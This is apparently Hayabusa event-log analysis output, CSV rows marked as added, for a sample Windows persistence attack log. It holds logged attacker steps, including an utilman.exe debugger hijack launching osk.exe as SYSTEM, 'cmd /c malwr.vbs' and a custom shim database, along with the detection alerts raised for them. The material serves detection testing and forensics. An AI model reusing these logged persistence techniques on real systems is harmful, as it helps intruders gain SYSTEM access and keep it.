+2019-03-20 05:58:35.745 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""c:\osk.exe"" | Process: C:\osk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: utilman.exe /debug | LID: 0x3e7 | PID: 2128 | PGUID: 365ABB72-57FB-5C91-0000-00104FD40900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""c:\osk.exe"" | LID: 0x3e7 | PID: 2456 | PGUID: 365ABB72-5804-5C91-0000-001044DE0900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Disc,Whoami Execution Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:00:01.518 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\wsqmcons.exe | Process: C:\Windows\System32\wsqmcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2772 | PGUID: 365ABB72-5851-5C91-0000-0010E1030A00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:00:01.539 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Process: C:\Windows\System32\schtasks.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\wsqmcons.exe | LID: 0x3e7 | PID: 2716 | PGUID: 365ABB72-5851-5C91-0000-00107D050A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:10:34.489 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 792 | PGUID: 365ABB72-5ACA-5C91-0000-0010DC1E0B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:18:54.257 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2884 | PGUID: 365ABB72-5CBE-5C91-0000-001017150C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:18:57.202 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3856 | PGUID: 365ABB72-5CC1-5C91-0000-0010DD2F0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:20:32.298 +09:00,PC01.example.corp,13,medium,Persis,Registry Modification to Hidden File Extension,,../hayabusa-rules/sigma/registry_event/win_re_hidden_extention.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:20:32.298 +09:00,PC01.example.corp,13,medium,Persis,Registry Modification to Hidden File Extension,,../hayabusa-rules/sigma/registry_event/win_re_hidden_extention.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:21:05.306 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 3568 | PGUID: 365ABB72-5D41-5C91-0000-0010D9080F00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:22:28.886 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | Process: C:\Windows\System32\rundll32.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3840 | PGUID: 365ABB72-5D94-5C91-0000-001080E90F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:22:33.593 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows NT\Accessories\WORDPAD.EXE"" ""C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb"" | Process: C:\Program Files\Windows NT\Accessories\wordpad.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | LID: 0x33435 | PID: 900 | PGUID: 365ABB72-5D99-5C91-0000-001051FA0F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:26:05.397 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2600 | PGUID: 365ABB72-5E6D-5C91-0000-001073BA1000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:26:08.852 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x33435 | PID: 2760 | PGUID: 365ABB72-5E70-5C91-0000-00107EBE1000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:31:05.509 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 572 | PGUID: 365ABB72-5F99-5C91-0000-0010B5421100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:36:05.610 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 1748 | PGUID: 365ABB72-60C5-5C91-0000-001061C31100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:41:05.702 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2400 | PGUID: 365ABB72-61F1-5C91-0000-0010554C1200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:41:11.440 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3364 | PGUID: 365ABB72-61F7-5C91-0000-001032511200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.EXE /c malwr.vbs | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x33435 | PID: 2340 | PGUID: 365ABB72-61FD-5C91-0000-0010536A1200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logoff | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x33435 | PID: 3668 | PGUID: 365ABB72-61FD-5C91-0000-0010E26A1200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:41:18.290 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x1 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 2952 | PGUID: 365ABB72-61FE-5C91-0000-001035771200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:41:18.410 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\servicing\TrustedInstaller.exe | Process: C:\Windows\servicing\TrustedInstaller.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1892 | PGUID: 365ABB72-61FE-5C91-0000-0010DF7F1200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:49.576 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 360 | PGUID: 365ABB72-777E-5C91-0000-00102B4B0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:49.856 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 368 | PGUID: 365ABB72-777E-5C91-0000-0010864D0000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:50.157 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 408 | PGUID: 365ABB72-777F-5C91-0000-00105E500000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 416 | PGUID: 365ABB72-777F-5C91-0000-001079500000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 428 | PGUID: 365ABB72-777F-5C91-0000-0010BF500000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:50.387 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 456 | PGUID: 365ABB72-777F-5C91-0000-0010D8520000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:50.427 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 516 | PGUID: 365ABB72-777F-5C91-0000-00100B590000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:50.467 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 524 | PGUID: 365ABB72-777F-5C91-0000-0010B95B0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:50.497 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsm.exe | Process: C:\Windows\System32\lsm.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 532 | PGUID: 365ABB72-777F-5C91-0000-0010EA5B0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:51.308 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 640 | PGUID: 365ABB72-7780-5C91-0000-00103C730000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:51.599 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\VBoxService.exe | Process: C:\Windows\System32\VBoxService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 704 | PGUID: 365ABB72-7780-5C91-0000-0010CFB00000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:51.679 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 904 | PGUID: 365ABB72-7781-5C91-0000-001040B90000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:51.789 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1016 | PGUID: 365ABB72-7781-5C91-0000-001036CB0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:53.111 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1140 | PGUID: 365ABB72-7782-5C91-0000-00102D0B0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:53.501 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Tasks\SA.DAT | Process: C:\Windows\system32\svchost.exe | PID: 1040 | PGUID: 365ABB72-7781-5C91-0000-0010C2CC0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:53.571 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1412 | PGUID: 365ABB72-7783-5C91-0000-0010DB2C0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1536 | PGUID: 365ABB72-7783-5C91-0000-001025410100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.102 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Startup | Process: C:\Windows\System32\gpscript.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x3e7 | PID: 1616 | PGUID: 365ABB72-7794-5C91-0000-0010DF510100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1628 | PGUID: 365ABB72-77A2-5C91-0000-00106D560100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-77A2-5C91-0000-00100A570100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1676 | PGUID: 365ABB72-77A2-5C91-0000-001006590100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.593 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1788 | PGUID: 365ABB72-77C0-5C91-0000-001044720100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1820 | PGUID: 365ABB72-77C0-5C91-0000-00106C740100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.623 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Temp\wodCmdTerm.exe | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | PID: 1788 | PGUID: 365ABB72-77C0-5C91-0000-001044720100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.783 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""taskhost.exe"" | Process: C:\Windows\System32\taskhost.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x17dad | PID: 1960 | PGUID: 365ABB72-77C4-5C91-0000-001013850100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.793 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1972 | PGUID: 365ABB72-77C4-5C91-0000-001011860100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.813 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\slui.exe"" | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1988 | PGUID: 365ABB72-77C4-5C91-0000-0010EA870100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
